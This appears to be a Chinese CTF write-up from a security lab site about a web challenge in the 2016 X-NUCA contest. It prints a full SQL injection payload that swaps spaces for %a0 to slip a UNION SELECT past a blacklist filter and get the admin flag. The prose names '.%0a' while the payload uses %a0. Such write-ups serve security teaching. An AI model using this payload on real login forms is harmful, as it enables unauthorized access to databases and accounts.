X-NUCA(牛咖)联赛7月web专题赛赛前--没那么简单的解题思路

发表于:2016-07-29 11:30:00 来源:  合天网安实验室 阅读数(0人)



发现存在robots.txt 文件





访问该地址。得到upload.zip


Upload.zip为index.php


查看Index.php后。




发现对大多数的字符进行了过滤。该过滤方式为黑名单判断,我们只需要找到程序中,为过滤完全的字符,进行payload编写即可。


查找wooyun或者其他地方的资料库,可以知道.%0a 同样可以用来做空格的代替。


那么我们只需要构造如下参数提交


username=admind'%a0union%a0select%a0'4124bc0a9335c27f086f24ba207a4912'%a0from%a0admin%a0where%a0'1'='1&password=aa

即可得到flag


相关新闻

大家都在学

课程详情

软件安全之恶意代码机理与防护

课程详情

web防御中的代码安全

课程详情

经典网安事件